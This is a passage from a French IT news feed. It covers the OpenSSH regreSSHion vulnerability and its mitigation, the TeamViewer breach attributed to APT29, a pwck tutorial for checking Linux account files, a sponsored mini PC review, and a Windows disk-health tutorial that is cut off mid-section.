Vue lecture

Il y a de nouveaux articles disponibles, cliquez pour rafraîchir la page.

Des millions de serveurs OpenSSH potentiellement vulnérables à l’attaque regreSSHion

Une nouvelle faille de sécurité critique a été corrigée dans OpenSSH ! En l'exploitant, un attaquant non authentifié pourrait exécuter du code à distance avec les privilèges "root" sur une machine Linux. Faisons le point.

Pour rappel, le très populaire OpenSSH (Open Secure Shell) est un ensemble d'outils libres qu'il est possible d'utiliser pour établir des connexions sécurisées entre deux hôtes, notamment grâce au protocole SSH.

La vulnérabilité CVE-2024-6387 présente dans le serveur OpenSSH (sshd) permet l'exécution de code à distance non authentifié (RCE) en tant que root sur les systèmes Linux basés sur la glibc. Il est important de noter que cette vulnérabilité est liée à une race condition, et qu'elle affecte sshd dans sa configuration par défaut. Néanmoins, ceci complexifie son exploitation.

Dans le cas où l'exploitation de la CVE-2024-6387 réussie, l'attaquant peut compromettre le serveur où OpenSSH est installé et en prendre le contrôle. Ceci ouvre la porte à un vol de données, à la mise en place d'un accès persistant, etc.

Les chercheurs en sécurité de chez Qualys, qui ont surnommé cette faille de sécurité "regreSSHion", ont mis en ligne un rapport complet à son sujet. D'ailleurs, Qualys précise avoir identifié pas moins de 14 millions de serveurs OpenSSH potentiellement vulnérables et exposés sur Internet. "Sur la base de recherches effectuées à l'aide de Censys et de Shodan, nous avons identifié plus de 14 millions d'instances de serveurs OpenSSH potentiellement vulnérables et exposées à l'internet.", peut-on lire.

Qui est affecté ? Comment se protéger ?

La faille de sécurité CVE-2024-6387 est la renaissance d'une vulnérabilité déjà corrigée dans OpenSSH, il y a plus de 15 ans. "D'après notre analyse de sécurité, nous avons identifié que cette vulnérabilité est une régression de la vulnérabilité CVE-2006-5051 précédemment corrigée, qui a été signalée en 2006.", précise les chercheurs en sécurité. Cette faille de sécurité a été réintroduite en octobre 2020 lors de la sortie d'OpenSSH 8.5p1.

Concrètement, la vulnérabilité affecte les versions d'OpenSSH comprises entre les versions 8.5p1 et 9.7p1. De plus, les versions antérieures à la version 4.4p1 sont également vulnérables à cette race condition, sauf si elles sont protégées contre les vulnérabilités CVE-2006-5051 et CVE-2008-4109. L'installation du correctif est recommandée dès que possible, surtout pour les serveurs et équipements exposés sur Internet.

Si votre système est vulnérable et que vous ne pouvez pas le mettre à jour dans l'immédiat, voici la mesure de protection alternative proposée par Qualys : "Si sshd ne peut pas être mis à jour ou recompilé, définissez LoginGraceTime à 0 dans le fichier de configuration. Cela expose sshd à un déni de service en utilisant toutes les connexions MaxStartups, mais évite le risque d'exécution de code à distance."

Pour rappel, voici le chemin vers le fichier de configuration d'OpenSSH Server :

/etc/ssh/sshd_config

Pour afficher la version d'OpenSSH installée sur votre serveur, utilisez cette commande :

ssh -V

Enfin, si vous utilisez OpenBSD, nous avons une bonne nouvelle pour vous : "Les systèmes OpenBSD ne sont pas affectés par ce bogue, car OpenBSD a développé en 2001 un mécanisme sécurisé qui prévient cette vulnérabilité.", précise le rapport.

Source

The post Des millions de serveurs OpenSSH potentiellement vulnérables à l’attaque regreSSHion first appeared on IT-Connect.

Cyberattaque chez TeamViewer : des mots de passe volés, mais ce ne sont pas ceux des utilisateurs !

Il y a quelques jours, TeamViewer a été victime d'une cyberattaque. Ces dernières heures, l'éditeur a communiqué des précisions sur les conséquences de cette attaque et celle-ci a été attribuée au groupe de pirates Midnight Blizzard.

Pour rappel, le mercredi 26 juin 2024, l'équipe de sécurité de TeamViewer a détecté une activité anormale et suspecte au sein de l'infrastructure informatique interne de TeamViewer. Suite à cette intrusion, TeamViewer avait cherché à rassurer ses utilisateurs en affirmant que l'environnement impacté était différent et isolé de celui utilisé pour la solution de prise en main à distance.

Dans ses dernières déclarations, TeamViewer se montre toujours rassurant sur ce point : "D'après les conclusions actuelles de l'enquête, l'attaque a été contenue dans l'environnement informatique de l'entreprise et rien ne prouve que l'auteur de la menace ait eu accès à l'environnement de nos produits ou aux données de nos clients.", peut-on lire.

TeamViewer victime de Midnight Blizzard

L'éditeur s'était alors engagé à être transparent sur la suite de ses découvertes en communiquant l'avancée de l'enquête au fur et à mesure de la progression de celle-ci. Désormais, TeamViewer a attribué cette attaque au groupe de pirates russes Midnight Blizzard, que l'on appelle également Nobelium et Cozy Bear, et qui est suivi en tant qu'APT29.

"En collaboration avec notre service externe de réponse aux incidents, nous attribuons actuellement cette activité à l'acteur de la menace connu sous le nom d'APT29 / Midnight Blizzard.", peut-on lire.

Que s'est-il passé ?

Grâce aux dernières révélations de TeamViewer, il est désormais possible de répondre à cette question. Les attaquants seraient parvenus à mettre la main sur les identifiants d'un salarié de TeamViewer afin de pouvoir accéder à l'environnement IT de l'éditeur. Cet accès aurait permis de "copier les données de l'annuaire des employés", au sein duquel se trouve les noms de salariés, les informations de contacts, ainsi que "les mots de passe chiffrés des employés pour notre environnement informatique interne de l'entreprise."

En réponse à cette cyberattaque, TeamViewer affirme avoir d'ores et déjà fait le nécessaire pour renforcer les méthodes d'authentification de ses employés. Une reconstruction de l'infrastructure IT interne est également évoquée pour renforcer sa sécurité.

Retrouvez tous les communiqués de TeamViewer sur cette page de leur site officiel.

The post Cyberattaque chez TeamViewer : des mots de passe volés, mais ce ne sont pas ceux des utilisateurs ! first appeared on IT-Connect.

Vérifier l’intégrité des fichiers passwd et shadow avec pwck sous Linux

I. Présentation

Dans ce tutoriel, nous allons étudier l'utilisation de la commande "pwck" sous Linux, un outil qui permet de vérifier l'intégrité des fichiers de comptes utilisateurs "/etc/passwd" et "/etc/shadow". L'outil pwck (Password Check) va nous aider à identifier et à corriger les erreurs courantes qui peuvent survenir dans ces fichiers.

La vérification de l'intégrité des fichiers de gestion des utilisateurs est importante pour assurer la sécurité et la stabilité d'un système Linux. Les fichiers "/etc/passwd" et "/etc/shadow" contiennent des informations critiques, respectivement sur les utilisateurs et leurs mots de passe. Une corruption ou une mauvaise configuration de ces fichiers peut entraîner des problèmes de sécurité ou des erreurs système.

Version originale de l'article : 22 novembre 2016.

II. Rappel sur les fichiers /etc/passwd et /etc/shadow

A. Le fichier /etc/passwd

Le fichier "/etc/passwd" est un fichier texte qui contient des informations de base sur les comptes utilisateur. Chaque ligne de ce fichier représente un utilisateur et contient plusieurs champs séparés par des deux-points (:). Voici un exemple de ligne typique du fichier "/etc/passwd" :

testuser2:x:1002:1002:Utilisateurtest,12,0609112091209,0309320932093,Etage 4:/home/testuser2:/bin/bash
Contenu du fichier passwd sous Linux
Exemple de fichiers /etc/passwd

Ce fichier est lisible par tous les utilisateurs du système, mais modifiable uniquement par l'utilisateur "root". Pour avoir le détail des champs de ce fichier, je vous invite à consulter la ressource suivante :

B. Le fichier /etc/shadow

Le fichier "/etc/shadow" contient des informations de sécurité plus sensibles concernant les comptes utilisateur, notamment les mots de passe sous forme de hashs. Comme pour le fichier "/etc/passwd", chaque ligne de ce fichier correspond à un utilisateur et contient plusieurs champs séparés par des deux-points (:). Voici un exemple de ligne typique du fichier /etc/shadow :

testuser2:$y$j9T$hWVugfT[...]UwbPB:19882:0:99999:7::

Par défaut, ce fichier n'est lisible et modifiable uniquement par l'utilisateur "root", cela, car il contient des informations sensibles. Pour plus de détails sur la structure du fichier /etc/shadow, je vous invite à consulter notre article sur ce sujet :

III. Vérifier l'intégrité des fichiers de gestion des utilisateurs

A. Introduction à pwck

pwck est une commande de vérification utilisée pour analyser les fichiers de comptes utilisateurs et de mots de passe pour détecter des erreurs ou des incohérences. Ces fichiers sont importants pour le bon fonctionnement du système lui-même, mais aussi des services qui y tournent et utilisent ces fichiers. La commande de base pour utiliser pwck est la suivante :

# Exécution de pwck via sudo
sudo pwck

# Ecécution de pwck en tant que root
pwck

Cette commande va vérifier les fichiers "/etc/passwd" et "/etc/shadow" pour s'assurer de leur intégrité. Vous aurez en retour des informations concernant les incohérences ou non conformités découvertes. Voici un exemple :

user 'lp': directory '/var/spool/lpd' does not exist
user 'news': directory '/var/spool/news' does not exist
user 'uucp': directory '/var/spool/uucp' does not exist
user 'www-data': directory '/var/www' does not exist
user 'list': directory '/var/list' does not exist
user 'irc': directory '/run/ircd' does not exist
pwck: no changes

B. Vérifier le fichier /etc/passwd

Si l'on souhaite vérifier uniquement le fichier "/etc/passwd", nous pouvons en spécifiant "/etc/passwd". pwck vérifie chaque ligne de ce fichier pour détecter des erreurs telles que :

  • Champs manquants ou mal formés ;
  • Nombre correct de champs
  • Nom utilisateur unique et valide
  • Validité des ID utilisateur et de groupe
  • Validité et présence du groupe primaire
  • Validité et présence du répertoire personnel
  • Validité du shell (« login shell »)

Pour vérifier uniquement le fichier "/etc/passwd", utilisez la commande suivante :

# Vérifier l'intégrité du fichier /etc/passwd avec pwck
sudo pwck /etc/passwd

Voici un exemple de retour que nous pourrions concernant les anomalies du fichier "/etc/passwd" :

user 'lp': directory '/var/spool/lpd' does not exist
user 'news': directory '/var/spool/news' does not exist
user 'uucp': directory '/var/spool/uucp' does not exist
user 'www-data': directory '/var/www' does not exist
user 'list': directory '/var/list' does not exist
user 'irc': directory '/run/ircd' does not exist
user 'vboxaddfake': program '/bin/testtest' does not exist
duplicate password entry
delete line 'mickael:x:0:0:mickael,,,,:/home/mickael/:/usr/bin/bash'? n
duplicate password entry
delete line 'mickael:x:1000:1000:mickael,,,:/home/mickael:/usr/bin/bash'? n
pwck: no changes

Comme vous le voyez, une des lignes de mon fichier "/etc/passwd" n'est pas valide, "pwck" me propose alors de la supprimer. Les autres erreurs remontées concernent ici des répertoires "home" qui n'existent pas sur le système et qui sont pourtant déclarés pour les utilisateurs correspondants. Pwck me rapporte également que le binaire déclaré dans le shell de l'utilisateur "vboxaddafake" n'existe pas et que celui-ci n'a pas de correspondance dans le fichier /etc/shadow.

Si vous ne souhaitez pas avoir de demande de modification automatique, il faut utiliser l'option "-r" (pour read-only). Cela permet d'être sûr de ne pas faire d'erreur pouvant impacter le fonctionnement du système et de vérifier avec précision la configuration avant toute modification.

C. Vérifier le fichier /etc/shadow

Le fichier "/etc/shadow" contient les mots de passe des utilisateurs de manière sécurisée. pwck s'assure que chaque entrée dans "/etc/passwd" a une entrée correspondante dans /etc/shadow. Pour vérifier uniquement le fichier "/etc/shadow", utilisez :

sudo pwck shadow

Comme pour le fichier "/etc/passwd", pwck va aussi vérifier que toutes les lignes utilisent le bon format, avec un nombre correct de champs, etc. Voici les informations vérifiées pour ce fichier :

  • Chaque entrée passwd a une entrée shadow correspondante, et inversement ;
  • Les mots de passe sont présents pour chaque utilisateur ;
  • Chaque utilisateur a un nombre correct de champs ;
  • Chaque entrée est unique ;
  • Les derniers changements de mot de passe ne sont pas dans le futur.

IV. Conclusion

Dans ce tutoriel, nous avons vu comment utiliser la commande pwck pour vérifier et maintenir l'intégrité des fichiers de comptes utilisateurs et de mots de passe sous Linux. En appliquant ces techniques et bonnes pratiques, vous pouvez assurer une gestion sécurisée et fiable de vos utilisateurs. L'automatisation de ces vérifications renforce la sécurité et minimise les risques d'erreurs non détectées.

The post Vérifier l’intégrité des fichiers passwd et shadow avec pwck sous Linux first appeared on IT-Connect.

Test Geekom GT13 Pro – Un mini PC haut de gamme avec un Intel Core i9

I. Présentation

Le Geekom GT13 Pro est un mini PC élégant grâce à son boitier en aluminium et puissant puisqu'il embarque un processeur Intel Core i9 de 13ème génération accompagné par 32 Go de RAM et un SSD NVMe de 2 To. Lisez la suite de ce test pour en savoir plus.

Cet article va évoquer les caractéristiques techniques du mini PC, son design, les évolutions possibles, ainsi que les performances.

Rappel : sur le marché des Mini PC, la marque Geekom est incontournable et elle s'est imposée comme un acteur majeur au niveau mondial. Elle a été créée en 2003 et la direction R&D de Geekom est située à Taïwan. En complément, la marque a plusieurs succursales dans différents pays du monde.

Geekom propose des mini PC de qualité. En complément de ce test, découvrez nos autres tests de mini PC Geekom. Voici les plus récents :

II. Caractéristiques du Geekom GT13 Pro

Commençons par découvrir les caractéristiques principales de ce modèle :

  • Processeur : Intel Core i9-13900H (14 Cœurs, 20 Threads, 24 Mo de cache, jusqu'à 5,40 GHz)
  • GPU : Iris Xe
  • RAM : 32 Go DDR4 260PIN 3200 MHz, extensible jusqu'à 64 Go
  • Stockage : 2 To de SSD NVMe (Gen.4*4), avec la possibilité d'ajouter un SSD M.2 2242 (SATA)
  • Connectique : 3 x ports USB 3.2 Gen 2 dont 1 avec Power Delivery + 1 x port USB 2.0 + 2 x ports USB4 + 1 prise casque Jack 3.5 mm + 1 x slot pour une carte SD + 1 x interface réseau LAN 2.5 GbE + 2 x ports HDMI 2.0 + 1 x port d'alimentation
  • Affichage : prise en charge jusqu'à 4 écrans avec prise en charge du 8K
  • WiFi 6E (AX211), Bluetooth 5.2
  • Alimentation : 19V, 6,32A DC - 120W
  • Dimensions (L x W x H) : 105.75 * 102.9 * 1.6 mm
  • Poids : 440 grammes
  • Système d'exploitation : Windows 11 Pro
  • Garantie : 3 ans

Le Geekom GT13 Pro est disponible en deux versions distinctes. Les deux versions sont équipées de 32 Go de RAM, mais la différence se situe au niveau du stockage et du CPU. Il y a une version 1 To de stockage SSD NVMe et un CPU Intel Core i7-13620H et une version avec 2 To de stockage SSD NVMe et un CPU Intel Core i9-13900H. C'est cette seconde version, plus puissante, qui fait l'objet de ce test.

Cette configuration est très alléchante sur le papier ! Sachez qu'il s'agit de la même configuration que le modèle Geekom IT13 ayant déjà fait l'objet d'un test sur IT-Connect (voir lien dans l'introduction). La différence entre ces deux modèles se situe au niveau du design et de la conception du boitier (le modèle IT13 permet d'ajouter un disque 2.5 pouces SATA). J'ai presque envie de dire que "le GT13 Pro correspond à la configuration de l'IT13 mise dans le boitier d'un A8".

III. Package et design

La boite ne trompe pas : nous sommes bien en possession d'un mini PC de la série GT de chez Geekom. La boite donne d'ailleurs un aperçu sur le design du boitier, et au dos de celle-ci, nous avons des informations sur la configuration matérielle (ceci permet de savoir quelle version est présente dans la boite).

La boite du mini PC est protégée par un blister. Une fois ouverte, le mini PC est le premier élément que nous puissions découvrir à l'intérieur de celle-ci. Placé au centre de la boite, il est correctement protégé et emballé afin de ne pas subir de chocs pendant le transport. Après l'avoir retiré de la boite, nous pouvons accéder aux accessoires.

Qu'avons-nous dans la boite ? Nous bénéficions du panel d'accessoires habituel chez Geekom, à savoir un câble HDMI, une alimentation externe et son câble, une plaque VESA (et les vis) permettant d'accrocher le mini PC à l'arrière d'un écran (support VESA) et une notice.

Au même titre que le Geekom A8, le Geekom GT13 Pro hérite d'un boîtier aluminium aux coins arrondis, de couleur gris anthracite. Ce boitier est très élégant et donne une allure haut de gamme à ce mini PC. Il n'y a que la partie arrière du boitier qui est en plastique noire (au niveau de la zone où il y a les ports).

Remarque : au-delà de l'esthétique, ce boitier aluminium va également jouer un rôle clé pour la dissipation thermique du boitier.

Ce mini PC n'occupera pas beaucoup de place sur votre bureau et il tient facilement dans la main. C'est une machine que nous pouvons facilement emporter avec nous.

Sur la façade, nous retrouvons deux ports USB, dont un port USB 3.2 Gen2 avec PowerDelivery (PD) et un port USB 3.2 Gen2 (sans PD). Une prise casque et un bouton Power lumineux complète la façade. Le côté droit du boitier et le côté gauche du boitier contiennent une aération parfaitement incrustée à la coque, afin de faciliter le flux d'air entrant. Petit bonus sur la gauche : la présence d'un emplacement pour une carte SD.

Ce boitier étant très compact, les ports sont assez serrés puisque la grande majorité de la connectique se situe à l'arrière du boitier. Il y a deux ports HDMI 2.0 et chacun d'eux et surplombé par un port USB4 au format USB-C avec PowerDelivery, soit 2 ports USB4. Sur la partie centrale, toujours à l'arrière, il y a le port RJ45 2.5 Gbit/s (compatible 1 Gbit/s) que deux autres ports USB : un port USB 3.2 Gen 2 et un port USB 2.0. Au total, le mini PC dispose de 6 ports USB.

L'extraction de l'air chaud s'effectue par l'arrière du boitier grâce à une aération positionnée au-dessus de l'ensemble de la connectique de la carte mère. La technologie de refroidissement IceBlast 1.5 de Geekom équipe ce boitier. Le fabricant promet un flux d'air élevé pour un faible bruit.

Difficile de passer à côté de l'inscription "GEEKOM" sur le dessus du boitier, brillante, mais toute de même discrète. Cela apporte une touche d'élégance supplémentaire à ce boitier qui n'en manque pas. Si nous retournons le mini PC, nous pouvons voir une étiquette avec diverses informations telles que le modèle, l'adresse MAC, ou encore le numéro de série.

Pour ouvrir le PC et accéder à ses entrailles, il sera nécessaire de retirer les patins afin d'accéder aux vis qui permettent d'ouvrir le boitier. Il est possible d'enlever les patins et de les remettre par la suite, sans trop de difficultés.

La vue éclatée ci-dessous montre bien que le boitier est constitué d'une coque unique en aluminium accompagnée par une plaque en plastique pour le dessous du boitier. Nous voyons bien également la place importante occupée par le système de refroidissement IceBlast 1.5 de Geekom.

L'ouverture du boitier donne l'occasion d'en savoir plus sur les références utilisées pour la RAM et le SSD NVMe. Ce sera aussi l'opportunité de voir si les composants sont facilement remplaçables.

  • Un SSD NVMe de marque ACER, avec la référence N7000, d'une capacité de 2 To est présent dans le boitier. Un pad thermique a été positionné sur le SSD, par Geekom (il est collé directement sur le support métallique). Du côté du Geekom IT13 et du Geekom A8, nous avions le droit à un ACER N5000.
  • Deux barrettes de RAM de marque Wooposit : 16 Go Rx8 - PC4-3200AA-S-11. Soit 32 Go au total. Il s'agit de la même référence que celle présente dans le Geekom IT13.

Ces composants sont facilement identifiables et remplaçables après avoir retiré les patins et les vis afin d'ouvrir le boitier. Dans la suite de ce test, nous allons justement évoquer l'évolutivité de ce modèle ainsi que ses performances.

IV. Évolutivité et performances

A. Mise en route et évolutivité

Avant de parler du système d'exploitation, parlons du BIOS AMI de ce mini PC. En tant qu'utilisateur, nous pouvons définir un mot de passe pour protéger l'accès au BIOS, changer l'ordre de démarrage, mais aussi activer ou désactiver certaines fonctionnalités. Par exemple, le Bluetooth et le Wi-Fi sont désactivables directement dans le BIOS. Nous avons aussi la main sur les fonctions liées à la virtualisation.

Au premier lancement, l'utilisateur est invité à finaliser l'installation du système Windows 11 Pro ! Nous retrouvons les étapes et questions habituelles propres au fonctionnement du système Windows 11. Il est tout à fait possible d'utiliser un compte local ou un compte Microsoft, au choix.

Geekom semble utiliser une image officielle de Windows 11 Pro, qui n'a pas été personnalisée. Nous retrouvons uniquement les applications natives ajoutées par Microsoft. Geekom n'a pas installé le moindre logiciel, et c'est tant mieux.

Un tour dans le gestionnaire de périphériques permet d'en savoir plus sur le modèle des cartes réseau. Nous pouvons aussi constater que la capacité utile du disque SSD NVMe de 2 To est de 1,81 To.

L'Intel Core i9 Raptor Lake utilisé par ce mini PC a été lancé sur le marché par Intel au premier trimestre 2023, il s'agit donc d'un modèle récent même si depuis Intel a lancé sa 14ème génération de processeurs. Ce processeur supporte 96 Go RAM au maximum, mais l'évolution est limitée à 64 Go, en DDR4. D'ailleurs, ceci implique de remplacer les deux barrettes déjà présentes, car les deux slots sont occupés.

Contrairement au Geekom A8, pourtant doté du même boitier, le Geekom GT13 Pro peut accueillir un disque SSD SATA supplémentaire. Attention toutefois, il s'agit d'un format moins répandu que le 2280 puisque ici, il s'agit d'un SSD M.2 2242 (SATA III). Par ailleurs, l'ajout d'une carte SD représente une option supplémentaire pour faire évoluer le stockage.

Enfin, vous pouvez connecter jusqu'à 4 écrans 4K sur ce mini PC en utilisant les ports USB4 et HDMI 2.0 présents à l'arrière du boitier.

Voici des détails techniques obtenus avec le logiciel CPU-Z :

B. Performances

Élégance est-il synonyme de performance ? Commençons par mesurer les performances du disque SSD NVMe du mini PC.

Les performances de ce disque SSD NVMe Acer N7000 sont vraiment excellentes et supérieures à celles du N5000 présent dans d'autres modèles Geekom !

Un copier-coller de gros fichiers en local (de disque à disque, sur le même volume), est effectué avec une vitesse moyenne de 2.28 Go/s ! En 43 secondes, j'ai pu dupliquer une bibliothèque d'images ISO de 101 Go ! C'est 13 secondes de moins que le même test effectué avec le Geekom IT13.

Voici un benchmark du disque effectué avec Crystal Disk Mark :

  • CrystalDiskInfo

Voici une analyse CrystalDiskInfo du disque SSD NVMe ACER N7000 monté en PCIe 4.0 x4.

  • Geekbench

J'ai également effectué un benchmark du CPU et du GPU avec Geekbench, vous pouvez y accéder sur ces pages :

Pendant le stress CPU, j'ai effectué quelques relevés de température avec HWMonitor. La température du CPU est rapidement montée jusqu'à 100 °C, pendant environ 2 secondes, avant que le système de refroidissement entre en action.

Ensuite, la température s'est stabilisée entre 82 et 87 °C. Pendant ce test, même si la ventilation s'est fait entendre, la machine est restée relativement silencieuse. Le dessus du boitier devient tiède et participe aussi à la dissipation de la chaleur. Lorsque la machine n'est pas sollicitée, la température relevée est de 44 °C.

  • Que peut-on faire et ne pas faire avec ce modèle ?

Je n'ai pas peur de le dire : le Geekom GT13 Pro est le mini PC Intel le plus puissant que j'ai eu l'occasion de tester. Son Intel Core i9 est très performant et il est associé à un disque SSD NVMe qui est tout simplement excellent. Bureautique, virtualisation et multimédias, sont des usages parfaitement adaptés pour ce mini PC.

Pour évaluer la partie "jeux-vidéos", j'ai fait une partie de GTA V sur le mini PC. Sans surprise, la qualité d'image est bonne et le jeu est très fluide, par contre de nombreux effets visuels sont désactivés. C'est normal, l'iGPU Intel Iris Xe du Core i9 ne peut pas rivaliser avec les cartes graphiques dédiées. Sur ce point, la puce AMD du Geekom A8 reste bien au-dessus. Précision importante : en phase de jeu, le dessus du mini PC était vraiment chaud, preuve que l'iGPU était fortement sollicité. Petit point d'attention sur le système de refroidissement.

Voici un aperçu avec deux copies d'écran :

V. Conclusion

Si vous recherchez de la performance brute, et que vous n'êtes pas trop gourmand sur la partie 3D, le Geekom GT13 Pro saura vous satisfaire ! À l'intérieur de ce boitier très élégant, se cache un trio gagnant : un processeur Intel Core i9, un SSD NVMe Acer N7000 et 32 Go DDR4 (dommage que ce ne soit pas de la DDR5 !). Ici, la différence est faite par le SSD Acer qui est plus performant que les SSD des autres modèles Geekom.

Le côté évolutif est intéressant également puisque la RAM peut être doublée et qu'il est possible d'ajouter un disque SSD SATA supplémentaire. C'est un petit plus vis-à-vis du modèle A8 dont le stockage n'est pas évolutif, mais qui a l'avantage sur la partie graphique. Preuve que ces deux modèles sont proches, ils sont proposés au même tarif : 930,00 euros.

Le Geekom GT13 Pro dans cette version est proposé à 930,00 euros. Ce mini PC haut de gamme est accompagné par une garantie constructeur de 3 ans.

Offre spéciale sur le Geekom GT13 Pro

Profitez de 5% de réduction sur Amazon.fr ou sur la boutique officielle de Geekom, grâce aux liens et aux codes ci-dessous.

👉 Sur Geekom.fr

Saisissez le code promo "itprgt13" dans votre panier pour obtenir 5% de réduction, soit une économie de 46,50 euros pour un prix final à 883,50 euros. Ce code est valide sans limites de temps.

Cliquez sur ce lien pour accéder à l'offre.

👉 Sur Amazon.fr

Saisissez le code promo "itprgt13" dans votre panier pour obtenir 5% de réduction. Le prix de vente est plus élevé sur Amazon, nous vous recommandons de passer par la boutique officielle.

Cliquez sur ce lien pour accéder à l'offre.

Merci à Geekom de m'avoir fourni un exemplaire de ce PC afin de pouvoir réaliser ce test.

The post Test Geekom GT13 Pro – Un mini PC haut de gamme avec un Intel Core i9 first appeared on IT-Connect.

Windows : comment connaître l’état de santé de son disque dur ou disque SSD ?

I. Présentation

Dans ce tutoriel, nous allons apprendre à utiliser des outils pratiques et fiables permettant de connaître l’état de santé de son disque dur, de son disque SSD ou son disque externe USB.

Comme tout composant d'un ordinateur, le support de stockage est susceptible de tomber en panne. Sur un poste de travail, le disque dur (HDD) ou le disque SSD sert à stocker les fichiers systèmes et les données de l'utilisateur. Des données importantes qui peuvent avoir une valeur inestimable pour l'utilisateur.

Si vous constatez une instabilité sur votre système, ou que votre disque dur mécanique émet un bruit suspect, il peut s'avérer judicieux de tester votre disque pour connaître son état de santé. Par ailleurs, il est recommandé d'effectuer des sauvegardes régulières de vos données afin d'éviter une perte de données.

Pour nous aider, nous pouvons utiliser différents outils. Il en existe une panoplie, qu’ils soient en mode graphique ou en ligne de commande. En plus d'indiquer l’état de santé général du disque, ces outils peuvent fournir d'autres informations telles que le nom du fabricant, le numéro de série, la version du firmware du disque, etc. Certains sont même utilisés pour réparer des partitions de disques défectueuses.

Les outils avec une interface graphique, qu’ils soient fournis par le BIOS/UEFI de l’ordinateur, par un développeur tierce, ou par un fabricant de disque, s'appuie dans une majorité des cas sur la technologie S.M.A.R.T. SMART, pour Self-Monitoring Analysis and Reporting Technology, que l'on peut littéralement traduire par « Technique d’Auto-surveillance, d’Analyse et de Rapport ».

Cette technologie utilisant des capteurs électroniques électromagnétiques insérés dans certains disques actuels, a pour but d’analyser ces derniers afin de générer un rapport sur l’état de santé général, décris par des indicateurs hexadécimaux, suivi d’une valeur comprise entre 1 et 253 en fonction du constructeur. Bien que la technologie S.M.A.R.T soit standardisée, chaque constructeur peut utiliser une échelle de valeur et des indicateurs qui lui plaisent, tout en respectant la norme. Plus d’informations sur le S.M.A.R.T ici.

II. Découverte de l'outil chkdsk

Le logiciel « chkdsk.exe » (abréviation de Check Disk ou Contrôle de disque en français) est un utilitaire propre aux systèmes d’exploitation Microsoft. Il fonctionne intégralement en ligne de commande et est souvent utilisé pour rechercher et réparer des clusters défectueux sur un volume de stockage.

À titre de rappel, un cluster est l'agrégation d’un ou de plusieurs secteurs (plus petite unité d’allocation physique d’un disque) pour en faire une unité d’allocation logique selon un type de système de fichiers spécifique (NTFS, FAT, FAT32, exFAT, etc.) implémenté sur un système.

Ce qui s’avère être très intéressant, car en réalité des clusters « malades » sont le plus souvent des signes annonciateurs de secteurs de disques, eux aussi, « malades ». Autrement dit, d’un disque presque en fin de vie.

Pour exécuter le logiciel chkdsk.exe, on a deux options :

  • On va le chercher depuis son répertoire « C:\Windows\System32 » et on l’exécute en tant qu’Administrateur. Il s’exécutera alors en lecture seule, c'est-à-dire qu’il analysera simplement le stockage afin de rechercher d’éventuelles erreurs…Sans toutefois effectuer de réparations quelconques même si cela est nécessaire. Ce mode n'étant pas interactif, nous ne pouvons pas préciser d'options.
  • On ouvre l’invite de commande en tant qu’Administrateur et on appelle la commande « chkdsk » avec les options voulues. Nous allons privilégier cette méthode. Voici la syntaxe à respecter :
chkdsk [<volume>[[<path>]<filename>]] [/f] [/v] [/r] [/x] [/i] [/c] [/l[:<size>]] [/b]

Où :

  • chkdsk est le logiciel à exécuter.
  • volume est la lettre du chemin d’accès du volume sur lequel on veut travailler.
  • /f, /r, /x, /c, /v, etc. sont des options à appliquer en fonction de l’objectif à atteindre (correction des erreurs de disque, récupération des informations sur des secteurs illisibles, etc.)
  • « <path> » et « <filename> » sont les paramètres du chemin relatif à un fichier sur lequel on souhaite travailler (rarement utilisé dans le cadre d’une réparation).

Comme évoqué précédemment, on peut bien évidemment entrer la commande « chkdsk » sans options, et elle se chargera juste d’analyser le ou les disques connectés au système en 3 étapes (Examen de la structure du fichier de base, examen de liaison des noms de fichiers, Examen des descripteurs de fichiers) et de produire un rapport sans action supplémentaire.

Si on veut aller plus loin que la simple production d’un rapport sur l’état de santé du disque (analyse, réparation des clusters défectueux ou illisible et extractions des fichiers par exemple), il est nécessaire de préciser le volume sur lequel on veut travailler ainsi qu’une ou plusieurs options en paramètres. Ainsi, l'analyse ira bien au-delà de « trois étapes ».

La commande « chkdsk x: /f /r » est souvent la plus utilisée (remplacer « x » par la lettre du chemin d’accès au lecteur à analyser) dans le cadre de la réparation et de la récupération d’une partition (ou des fichiers) passée sous RAW par exemple.

chkdsk x: /f /r

Note : La commande « chkdsk » ne s’applique que sur des disques locaux et non sur des volumes distants comme ceux accessibles en réseau via un partage SMB , par exemple.

La commande «chkdsk » peut bien évidemment être automatisée et lancée à un moment précis en la mettant dans un fichier ".bat" qu’on exécutera ensuite par l'intermédiaire d'une tâche planifiée dans Windows. Ceci doit être configuré via le Planificateur de tâches du système.

Plus d’informations sur la commande « chkdsk » sur ce lien : chkdsk

III. Vérifier l'état de santé d'un disque avec CrystalDiskInfo

Certainement l’outil de test le plus répandu et le plus utilisé, du fait de sa compatibilité avec la plupart des disques, que ce soit des disques mécaniques ou des disques avec une mémoire flash (SSD). Peu importe le constructeur Seagate, Western Digital, SanDisk, etc. et qu’ils soient montés en RAID ou en volume simple, CrystalDiskInfo pourra fonctionner.

L'un des autres avantages de ce dernier est qu’il est totalement gratuit, que ce soit en version portable ou installable sous Windows.

CrystalDiskInfo s’appuie sur la technologie S.M.A.R.T pour produire un rapport sur l’état de santé d’un disque donné (généralement sous trois couleurs) :

  • Bleu (Correct) : disque en bonne santé
  • Jaune (Prudence) : disque avec quelques défauts…Mais, encore fonctionnel.
  • Rouge (Mauvais) : disque défectueux (cas des partitions RAW)

De plus, il permet également d’obtenir une multitude d’informations sur ce dernier (fabricant du disque, taille, numéro de série, version du firmware, mode transfert des données, le nombre d’heures de fonctionnement, la température, etc.) et donne même la possibilité d’envoyer des notifications à l’utilisateur de façon visuelle (e-mail) ou sonore, etc.

Tous ces éléments détermineront bien sûr s’il faut continuer de garder et/ou d’utiliser le disque ou pas.

Note : CrystalDiskInfo ne fonctionne qu’avec des disques intégrant la technologie S.M.A.R.T et il ne fonctionne pas avec les clés USB ainsi que les lecteurs réseaux. Par contre, il fonctionne avec les disques externes USB. De plus, il permet juste d’afficher un rapport détaillé quant à l’état de santé d’un disque et n’offre en aucun cas la possibilité d’une quelconque réparation logique.

Pour télécharger CrystalDiskInfo, rendez-vous sur SourceForge (dépôt officiel pour télécharger l'outil) :

IV. Le BIOS/UEFI et les outils constructeurs

Certains BIOS/UEFI d’ordinateurs peuvent aussi aider à obtenir des informations relatives à l’état de santé d’un disque. Cet outil intégré à la machine peut s'appuyer sur la technologie S.M.A.R.T et/ou sur une technologie mise au point par le constructeur, avec des tests personnalisés.

À la suite de cet auto-test de disque court ou long, un code (ou un identifiant) est généré. Il faudra ensuite récupérer et aller comparer (en plus d’autres informations comme la version du BIOS/UEFI) à des résultats stockés dans une base de données en ligne.

A. L'outil ePSA de Dell

